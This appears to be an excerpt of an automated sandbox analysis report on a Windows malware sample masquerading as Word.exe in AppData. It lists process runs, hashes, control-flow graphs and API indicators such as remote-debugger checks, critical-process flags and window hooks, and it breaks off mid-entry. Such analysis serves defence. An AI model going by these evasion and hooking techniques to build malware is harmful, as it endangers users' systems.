                                                                Commandline:"C:\Users\user\AppData\Roaming\Word.exe"
                                                                Imagebase:0x60000
                                                                File size:445'952 bytes
                                                                MD5 hash:9FF920C7C3199DBFFF9B507272C9F65A
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:24
                                                                Start time:11:14:51
                                                                Start date:29/11/2024
                                                                Path:C:\Users\user\AppData\Roaming\Word.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Users\user\AppData\Roaming\Word.exe"
                                                                Imagebase:0x990000
                                                                File size:445'952 bytes
                                                                MD5 hash:9FF920C7C3199DBFFF9B507272C9F65A
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:25
                                                                Start time:11:15:01
                                                                Start date:29/11/2024
                                                                Path:C:\Users\user\AppData\Roaming\Word.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Users\user\AppData\Roaming\Word.exe
                                                                Imagebase:0xea0000
                                                                File size:445'952 bytes
                                                                MD5 hash:9FF920C7C3199DBFFF9B507272C9F65A
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:24.6%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:33.3%
                                                                  Total number of Nodes:9
                                                                  Total number of Limit Nodes:0

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 7ffaac489b09-7ffaac489b39 call 7ffaac488f40 5 7ffaac489b3c-7ffaac489b9d call 7ffaac480388 call 7ffaac4880d8 0->5 12 7ffaac489b9f-7ffaac489bb1 5->12 13 7ffaac489bd1-7ffaac489bf4 5->13 12->5 15 7ffaac489bb3-7ffaac489bcc call 7ffaac480398 12->15 18 7ffaac489bfa-7ffaac489c07 13->18 19 7ffaac48acad-7ffaac48acb4 13->19 15->13 20 7ffaac489f68 18->20 21 7ffaac489c0d-7ffaac489c4b 18->21 22 7ffaac48acbe-7ffaac48acc5 19->22 23 7ffaac489f6d-7ffaac489fa1 20->23 28 7ffaac48ac88-7ffaac48ac8e 21->28 29 7ffaac489c51-7ffaac489c6e call 7ffaac488368 21->29 24 7ffaac48acd6-7ffaac48acdd 22->24 25 7ffaac48acc7-7ffaac48accf 22->25 30 7ffaac489fa8-7ffaac489fea 23->30 25->24 27 7ffaac48acd1 call 7ffaac480378 25->27 27->24 31 7ffaac48ace2 28->31 32 7ffaac48ac90-7ffaac48aca7 28->32 29->28 37 7ffaac489c74-7ffaac489cae 29->37 48 7ffaac489fec-7ffaac48a00d 30->48 49 7ffaac48a00f-7ffaac48a043 30->49 36 7ffaac48ace7-7ffaac48ad22 31->36 32->18 32->19 42 7ffaac48ad27-7ffaac48ad74 36->42 45 7ffaac489d0d-7ffaac489d35 37->45 46 7ffaac489cb0-7ffaac489d03 37->46 73 7ffaac48ad76-7ffaac48ad97 42->73 74 7ffaac48ad9c-7ffaac48add7 42->74 53 7ffaac48a629-7ffaac48a651 45->53 54 7ffaac489d3b-7ffaac489d48 45->54 46->45 56 7ffaac48a04a-7ffaac48a08c 48->56 49->56 53->28 64 7ffaac48a657-7ffaac48a664 53->64 54->20 58 7ffaac489d4e-7ffaac489e40 54->58 79 7ffaac48a08e-7ffaac48a0af 56->79 80 7ffaac48a0b1-7ffaac48a0e5 56->80 139 7ffaac489e46-7ffaac489f43 call 7ffaac480358 58->139 140 7ffaac48a600-7ffaac48a606 58->140 64->20 67 7ffaac48a66a-7ffaac48a760 64->67 84 7ffaac48addc-7ffaac48ae17 67->84 122 7ffaac48a766-7ffaac48a7c9 67->122 73->74 74->84 86 7ffaac48a0ec-7ffaac48a203 call 7ffaac480358 79->86 80->86 95 7ffaac48ae1c-7ffaac48ae57 84->95 164 7ffaac48a205-7ffaac48a226 86->164 165 7ffaac48a228-7ffaac48a25c 86->165 104 7ffaac48ae5c-7ffaac48ae97 95->104 112 7ffaac48ae9c-7ffaac48aed7 104->112 120 7ffaac48aedc-7ffaac48af17 112->120 130 7ffaac48af1c-7ffaac48af6c 120->130 122->95 146 7ffaac48a7cf-7ffaac48a832 122->146 155 7ffaac48af94-7ffaac48afc8 130->155 156 7ffaac48af6e-7ffaac48af8f 130->156 139->23 195 7ffaac489f45-7ffaac489f66 139->195 140->31 141 7ffaac48a60c-7ffaac48a623 140->141 141->53 141->54 146->104 172 7ffaac48a838-7ffaac48a996 call 7ffaac4882d8 146->172 162 7ffaac48afcf 155->162 156->155 162->162 167 7ffaac48a263-7ffaac48a2fa 164->167 165->167 167->20 198 7ffaac48a300-7ffaac48a4b0 call 7ffaac480358 167->198 172->112 221 7ffaac48a99c-7ffaac48ab0a 172->221 195->30 198->31 245 7ffaac48a4b6-7ffaac48a4b8 198->245 221->31 259 7ffaac48ab10-7ffaac48ab12 221->259 245->42 246 7ffaac48a4be-7ffaac48a4fc 245->246 246->36 256 7ffaac48a502-7ffaac48a58d 246->256 271 7ffaac48a5dd-7ffaac48a5fa 256->271 272 7ffaac48a58f-7ffaac48a5d6 256->272 259->130 261 7ffaac48ab18-7ffaac48ab56 259->261 261->120 270 7ffaac48ab5c-7ffaac48ab99 261->270 276 7ffaac48ac15-7ffaac48ac33 270->276 277 7ffaac48ab9b-7ffaac48abea 270->277 271->140 272->271 278 7ffaac48ac3a-7ffaac48ac69 276->278 277->278 285 7ffaac48abec-7ffaac48ac08 277->285 278->31 280 7ffaac48ac6b-7ffaac48ac82 278->280 280->64 281 7ffaac48ac84 280->281 285->281 287 7ffaac48ac0a-7ffaac48ac13 285->287 287->276
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2571052438.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffaac480000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6
                                                                  • API String ID: 0-1777295168
                                                                  • Opcode ID: 82f3895074f3c1c8132097cfe21bca7fa7af708cd88d6d8647d4022da78d6bc0
                                                                  • Instruction ID: 95e1cb201671da2e3f2ca0d559a6c30a29767fc52c18b2fee0c0729bd783a1ff
                                                                  • Opcode Fuzzy Hash: 82f3895074f3c1c8132097cfe21bca7fa7af708cd88d6d8647d4022da78d6bc0
                                                                  • Instruction Fuzzy Hash: 36D252B0A18B098FE798EB28C899A7DB7E1FF99314F54457DD04ED3291DE34A8818B41

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 288 7ffaac49128a-7ffaac491293 289 7ffaac491295 288->289 290 7ffaac491296-7ffaac4912a7 288->290 289->290 291 7ffaac4912a9 290->291 292 7ffaac4912aa-7ffaac4912bb 290->292 291->292 293 7ffaac4912bd 292->293 294 7ffaac4912be-7ffaac491306 292->294 293->294 298 7ffaac49130c-7ffaac491315 294->298 299 7ffaac49131b-7ffaac491345 298->299 300 7ffaac491eae-7ffaac491ebc 298->300 303 7ffaac491696-7ffaac491699 299->303 304 7ffaac49134b-7ffaac491366 299->304 305 7ffaac491ea8-7ffaac491ead 303->305 306 7ffaac49169f-7ffaac4916a2 303->306 304->303 310 7ffaac49136c-7ffaac4913c4 304->310 305->300 306->299 307 7ffaac4916a8 306->307 307->300 314 7ffaac4913ca-7ffaac49141a 310->314 315 7ffaac4916ad-7ffaac491786 call 7ffaac480d40 310->315 322 7ffaac49178b-7ffaac4917d2 call 7ffaac480d40 314->322 323 7ffaac491420-7ffaac491470 314->323 315->300 343 7ffaac4915e6 322->343 344 7ffaac4917d8-7ffaac4917df 322->344 333 7ffaac491934-7ffaac491974 323->333 334 7ffaac491476-7ffaac4914c6 323->334 333->343 359 7ffaac49197a-7ffaac4919de 333->359 353 7ffaac4919fa-7ffaac491a06 334->353 354 7ffaac4914cc-7ffaac49151c 334->354 352 7ffaac4915eb-7ffaac4915f1 343->352 347 7ffaac4917e5-7ffaac49180c 344->347 348 7ffaac4917e1-7ffaac4917e3 344->348 351 7ffaac49180e-7ffaac49187f 347->351 348->351 351->343 423 7ffaac491885-7ffaac49188c 351->423 365 7ffaac4915f4-7ffaac4915f7 352->365 353->343 361 7ffaac491a0c-7ffaac491a1c 353->361 382 7ffaac491522-7ffaac491572 354->382 383 7ffaac491aed-7ffaac491b2d 354->383 407 7ffaac4919ed-7ffaac4919f5 call 7ffaac48c5f8 359->407 408 7ffaac4919e0-7ffaac4919e8 call 7ffaac48c600 359->408 361->300 372 7ffaac491a22-7ffaac491a62 361->372 369 7ffaac491682-7ffaac491686 365->369 370 7ffaac4915fd-7ffaac491cb0 365->370 369->305 375 7ffaac49168c-7ffaac491690 369->375 370->300 380 7ffaac491cb6-7ffaac491d12 call 7ffaac480d40 370->380 372->343 403 7ffaac491a68-7ffaac491a82 372->403 375->303 375->310 380->343 433 7ffaac491d18-7ffaac491d45 call 7ffaac490ed0 380->433 410 7ffaac491bd7-7ffaac491c17 382->410 411 7ffaac491578-7ffaac4915c8 382->411 383->343 419 7ffaac491b33-7ffaac491b3a 383->419 403->343 421 7ffaac491a88-7ffaac491ae8 call 7ffaac490ed0 403->421 407->300 408->300 410->343 454 7ffaac491c1d-7ffaac491ca4 call 7ffaac480d40 call 7ffaac48dba0 410->454 443 7ffaac491602-7ffaac491652 411->443 444 7ffaac4915ca-7ffaac4915d6 411->444 424 7ffaac491b3c-7ffaac491b3f 419->424 425 7ffaac491b41-7ffaac491b69 419->425 421->300 429 7ffaac491893-7ffaac4918bb 423->429 430 7ffaac49188e-7ffaac491891 423->430 431 7ffaac491b6b-7ffaac491bd2 call 7ffaac48c600 424->431 425->431 437 7ffaac4918bd-7ffaac49192f call 7ffaac48dba0 429->437 430->437 431->300 433->343 471 7ffaac491d4b-7ffaac491d68 433->471 437->300 443->369 475 7ffaac491654-7ffaac491660 443->475 444->343 451 7ffaac4915d8-7ffaac4915df 444->451 451->352 457 7ffaac4915e1-7ffaac4915e4 451->457 454->300 457->365 471->343 481 7ffaac491d6e-7ffaac491d8b 471->481 475->343 479 7ffaac491662-7ffaac491669 475->479 483 7ffaac49166b-7ffaac49166e 479->483 484 7ffaac491670-7ffaac491676 479->484 481->343 495 7ffaac491d91-7ffaac491df3 call 7ffaac48c5f8 481->495 487 7ffaac491679-7ffaac49167c 483->487 484->487 487->369 492 7ffaac491df8-7ffaac491dff 487->492 492->300 493 7ffaac491e05-7ffaac491ea6 call 7ffaac480d40 call 7ffaac48c5f8 492->493 493->300 495->300
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2571052438.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffaac480000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6
                                                                  • API String ID: 0-1348531229
                                                                  • Opcode ID: 655507f4f34a89e7a76ebe1ed60772e7f91f9f30b82e541ae86a377affb964a2
                                                                  • Instruction ID: f1345505be5ce665aa86aebe04b9e90519573a3734cf2efd7af9821d607a218a
                                                                  • Opcode Fuzzy Hash: 655507f4f34a89e7a76ebe1ed60772e7f91f9f30b82e541ae86a377affb964a2
                                                                  • Instruction Fuzzy Hash: 7672D660B1CB058BF758EB78845E679B6D2FF99344F54857DE40EC32D2DE28E8418782

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 519 7ffaac4812f8-7ffaac48170b 522 7ffaac48170d-7ffaac481715 519->522 523 7ffaac48177c-7ffaac481780 519->523 524 7ffaac48178c-7ffaac481885 call 7ffaac480638 * 6 call 7ffaac480a48 523->524 525 7ffaac481787 call 7ffaac480638 523->525 555 7ffaac48188f-7ffaac481906 call 7ffaac4804b8 call 7ffaac4804b0 call 7ffaac480358 call 7ffaac480368 524->555 556 7ffaac481887-7ffaac48188e 524->556 525->524 571 7ffaac481919-7ffaac481929 555->571 572 7ffaac481908-7ffaac481912 555->572 556->555 575 7ffaac481951-7ffaac481971 571->575 576 7ffaac48192b-7ffaac48194a call 7ffaac480358 571->576 572->571 582 7ffaac481973-7ffaac48197d call 7ffaac480378 575->582 583 7ffaac481982-7ffaac4819e6 call 7ffaac481038 575->583 576->575 582->583 594 7ffaac4819ec-7ffaac481a81 583->594 595 7ffaac481a86-7ffaac481b14 583->595 614 7ffaac481b1b-7ffaac481c59 call 7ffaac480870 call 7ffaac4812f0 call 7ffaac480388 call 7ffaac480398 594->614 595->614 638 7ffaac481c5b-7ffaac481c8e 614->638 639 7ffaac481ca7-7ffaac481cda 614->639 638->639 646 7ffaac481c90-7ffaac481c9d 638->646 650 7ffaac481cff-7ffaac481d2f 639->650 651 7ffaac481cdc-7ffaac481cfd 639->651 646->639 649 7ffaac481c9f-7ffaac481ca5 646->649 649->639 652 7ffaac481d37-7ffaac481d6e 650->652 651->652 659 7ffaac481d70-7ffaac481d91 652->659 660 7ffaac481d93-7ffaac481dc3 652->660 661 7ffaac481dcb-7ffaac481eb2 call 7ffaac4803a8 call 7ffaac481210 call 7ffaac4809e8 call 7ffaac481038 659->661 660->661 682 7ffaac481eb9-7ffaac481f52 661->682 683 7ffaac481eb4 call 7ffaac481288 661->683 683->682
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2571052438.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffaac480000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6$6$6$6$"r
                                                                  • API String ID: 0-3979851792
                                                                  • Opcode ID: c09d0d5e0d83941f01999d66f3ee51f433d8aee008d36e3de659e91429b4db7b
                                                                  • Instruction ID: 8e6ebc6f71bd70c7e3a3b07e597385ad536cb73998b00d13429e9d007d11ea2d
                                                                  • Opcode Fuzzy Hash: c09d0d5e0d83941f01999d66f3ee51f433d8aee008d36e3de659e91429b4db7b
                                                                  • Instruction Fuzzy Hash: 8232E461B29A458BF794EB3CC869A79B7D2EF99304F44457AD00EC32D6DE28E84187C1

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2571052438.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffaac480000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6$6$6$6$"r
                                                                  • API String ID: 0-3979851792
                                                                  • Opcode ID: 415b01831805f50d95ed388e606e6318445fcfaa75a75677ff89efaf56127135
                                                                  • Instruction ID: e83c224d31d2d94fc028160089c757f8b922a8018cca610c2940c4538ca1f59a
                                                                  • Opcode Fuzzy Hash: 415b01831805f50d95ed388e606e6318445fcfaa75a75677ff89efaf56127135
                                                                  • Instruction Fuzzy Hash: 1222F661A29A498FF798E738C86DABD7BD1EF99304F40457AD00EC32D6DD28E94583C1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2571052438.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffaac480000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID: 0-3916222277
                                                                  • Opcode ID: fcbf18baf877737341e9ab4572d768bef57c53fdd3b814e74c6251f13904acf3
                                                                  • Instruction ID: ff6baa4228d12c041b80e5a3d4441f8f12955201362ca2a6392ada4cafca3f95
                                                                  • Opcode Fuzzy Hash: fcbf18baf877737341e9ab4572d768bef57c53fdd3b814e74c6251f13904acf3
                                                                  • Instruction Fuzzy Hash: C772B370B1D91A8FFB94FB78C499A7D66D6EF99344B508578D01EC32C6DE28EC428780
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2571052438.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffaac480000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CheckDebuggerPresentRemote
                                                                  • String ID:
                                                                  • API String ID: 3662101638-0
                                                                  • Opcode ID: f9c4c0654dc18a0c3cff3ebb37ada656dbcd2368a64fc4fa6e489df8c2b23249
                                                                  • Instruction ID: 0c7dc0f2a0f155190fdbb89a47df6dd65dec66f50a5b51acdffa3364a287fc2b
                                                                  • Opcode Fuzzy Hash: f9c4c0654dc18a0c3cff3ebb37ada656dbcd2368a64fc4fa6e489df8c2b23249
                                                                  • Instruction Fuzzy Hash: 6C3134318087588FCB58DF68C84AAF97FE0EF65321F04816BD489C7292CB34A846CB91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2571052438.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffaac480000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: r6
                                                                  • API String ID: 0-2984296541
                                                                  • Opcode ID: ca660be7eb7ec9dc2ab7a60b17b470996de513a55df7cab7f480d77e1764452c
                                                                  • Instruction ID: 945fe5c1c6eb3ee60e65e14314c9c6bcbd310a05e4b02b5f2094e510a9e6b847
                                                                  • Opcode Fuzzy Hash: ca660be7eb7ec9dc2ab7a60b17b470996de513a55df7cab7f480d77e1764452c
                                                                  • Instruction Fuzzy Hash: 7651645061E6C94FE396A77898686767FD9DF97229B1801FBE0CDC71E3DD08480AC382
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2571052438.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffaac480000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 80ed3cce61c44bc78109d5722c878940b55c7700c46a9bed096a879fce0174d6
                                                                  • Instruction ID: b459fe43fe472e4f7cfa397468747a3fca8a3dd68cc29d01b662cc61bd539ae0
                                                                  • Opcode Fuzzy Hash: 80ed3cce61c44bc78109d5722c878940b55c7700c46a9bed096a879fce0174d6
                                                                  • Instruction Fuzzy Hash: 5C420070D09529CFEB64EB24C459BF9B3B1FF59304F1085B9D00EA7292CE39A985CB94
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2571052438.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffaac480000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9663f0fa7b1f6b97c152dc22fd06e9375e1cf50cd6aa2ec08b44d4322e38fa4f
                                                                  • Instruction ID: 9fea73a0a40a50024e9ddf2b312424473688b3fc81c2ab3b483d209afe82645e
                                                                  • Opcode Fuzzy Hash: 9663f0fa7b1f6b97c152dc22fd06e9375e1cf50cd6aa2ec08b44d4322e38fa4f
                                                                  • Instruction Fuzzy Hash: DEF19270908A8D8FFBA8DF28D859BF937D1FF55310F04826AE85DC7291CB3499458B81
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2571052438.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffaac480000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6b63e6a0e859ec674b47638363853ca87c9b9f6652896d854a6f6cc5b549947b
                                                                  • Instruction ID: 82305cb5e3d5855d740acc2ec54b6dcf4760e5f72ef2220993bb5307d4e8cae8
                                                                  • Opcode Fuzzy Hash: 6b63e6a0e859ec674b47638363853ca87c9b9f6652896d854a6f6cc5b549947b
                                                                  • Instruction Fuzzy Hash: ABE1C330909A4E8FEBA8DF28C8597F97BD1FB55310F04826AE85DC7291CE34D9458BC1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2571052438.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffaac480000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 36f1270adfcab1476fe34b39e323a7e67f83fdb551716a9703023f19c250396b
                                                                  • Instruction ID: 6fff59c77560bedb36749b36cd09d9385df5bec6fdc476225a49fb3f8d9aa3f0
                                                                  • Opcode Fuzzy Hash: 36f1270adfcab1476fe34b39e323a7e67f83fdb551716a9703023f19c250396b
                                                                  • Instruction Fuzzy Hash: 3851B670919A1DCFDB98EF68D495AACB7F1FF59305F104469D00EE7292CA35A881CB44
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2571052438.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffaac480000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalProcess
                                                                  • String ID:
                                                                  • API String ID: 2695349919-0
                                                                  • Opcode ID: 20d2f91a4c282972569f9aabdcc70a9290288a317408f16e24c2c2616f45b300
                                                                  • Instruction ID: e69e4d61133ebf9a67cc71416e3919414d527f6397e880cb304ebf6776e490d2
                                                                  • Opcode Fuzzy Hash: 20d2f91a4c282972569f9aabdcc70a9290288a317408f16e24c2c2616f45b300
                                                                  • Instruction Fuzzy Hash: 0641273180C7488FD719DBA8D845BEA7FF4EF56311F04416EE08AC3692CB746846CB91
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2571052438.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffaac480000_file.jbxd
                                                                  Similarity
                                                                  • API ID: HookWindows
                                                                  • String ID:
                                                                  • API String ID: 2559412058-0
                                                                  • Opcode ID: 04eba0974f28bc14a74b1e4cf2479574fbbec4072302fb99e9ad99315a084d19
                                                                  • Instruction ID: 6e14e12f9bf6ae9c368b2adba02b6f713e3fd5414db3198ce3201b4a6fdcb47d
                                                                  • Opcode Fuzzy Hash: 04eba0974f28bc14a74b1e4cf2479574fbbec4072302fb99e9ad99315a084d19
                                                                  • Instruction Fuzzy Hash: 7C412B3191CA4D8FEB18DB6CD84A6F97BE1EB59321F00427ED04DD3292CE74A81687C1
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.1338477467.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffaac550000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7a44d39556c4bcee39ee13b34b0b24d69e1db81936427890c0ff2356b289ad58
                                                                  • Instruction ID: e3b01e8bf89d9b73e371ca90a798ebae915423c575970ad7f55da35ace25cc54
                                                                  • Opcode Fuzzy Hash: 7a44d39556c4bcee39ee13b34b0b24d69e1db81936427890c0ff2356b289ad58
                                                                  • Instruction Fuzzy Hash: C9D167B294EACE8FF7549B6898159B57BE5EF56310B0441BEE00DC72D3DD19EC098381
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.1337955875.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffaac480000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 68bbf03abe460140cd3f441736d157606a64a6056189c01f15a252c3982cd673
                                                                  • Instruction ID: b15c96cd81bf3f7d54745da07850560b0db315be53c0ae654f46f185e65fdc68
                                                                  • Opcode Fuzzy Hash: 68bbf03abe460140cd3f441736d157606a64a6056189c01f15a252c3982cd673
                                                                  • Instruction Fuzzy Hash: E551C76294E7C54FE302AB6CE8764F93FB0DF53229B0981F7C0D8CA1A3D81858498796
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.1337955875.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffaac480000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 95fc27633a76b8759f46cfb79f8a934a69117e2bbae6874643126c252053c883
                                                                  • Instruction ID: 1cfa072e5c4f9a9da5252484d15055c322c2d0929c0f35d010d4d1c7f173cac1
                                                                  • Opcode Fuzzy Hash: 95fc27633a76b8759f46cfb79f8a934a69117e2bbae6874643126c252053c883
                                                                  • Instruction Fuzzy Hash: DE913C6290EBC58FF7069B6CAC5E5F43FA0EF63214F0840BBD09D87193D915A90987D6
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.1337955875.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffaac480000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a5c8ce58d22d4f7b79aae4dab280182dbc5d21706a26179387b67a83f3e91738
                                                                  • Instruction ID: 4b7dc558fa4de628ec5d888b06ba5d793176c3391af464b7389a11f4bdacc02f
                                                                  • Opcode Fuzzy Hash: a5c8ce58d22d4f7b79aae4dab280182dbc5d21706a26179387b67a83f3e91738
                                                                  • Instruction Fuzzy Hash: 5B11286280E7C84FE7439B348C3A0A43FB09F53205B0A40EBD089CB1B3D559994CC7A6
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.1337955875.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffaac480000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2f73df5ff3d49833be00956e6b97a5dc06744e02ebb005b4c3250cc98d2dea81
                                                                  • Instruction ID: 00eae5a259921ca24779a8ba01cc2b4f38e39222b762dfd3d84eddcdb549bba9
                                                                  • Opcode Fuzzy Hash: 2f73df5ff3d49833be00956e6b97a5dc06744e02ebb005b4c3250cc98d2dea81
                                                                  • Instruction Fuzzy Hash: 0D31463190CB488FEB18DBACA84A6F97BE0EB96330F04816FD049C3156D675A45ACB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.1337527955.00007FFAAC36D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC36D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffaac36d000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 800110170282ae6e8490cfb6cf1b9fceb4472edace9c458100a4ba4600806313
                                                                  • Instruction ID: 2a91f882ab189da926cc48d526ce2081350281cefa072a6871278bc3f3cecf45
                                                                  • Opcode Fuzzy Hash: 800110170282ae6e8490cfb6cf1b9fceb4472edace9c458100a4ba4600806313
                                                                  • Instruction Fuzzy Hash: 8041037140DBC48FE7569B289845952BFF0EF52320B1505DFE088CB1A3D625E84AC7A2
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.1337955875.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffaac480000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                  • Instruction ID: fa6fc882dfd95574baba5a2dd2e69265abbf835bfde3577d4f432220f6d2f2fa
                                                                  • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                  • Instruction Fuzzy Hash: 4D01677111CB0C8FD744EF0CE451AB5B7E0FB95364F10056DE58AC3661DA36E892CB45
                                                                  Memory Dump Source
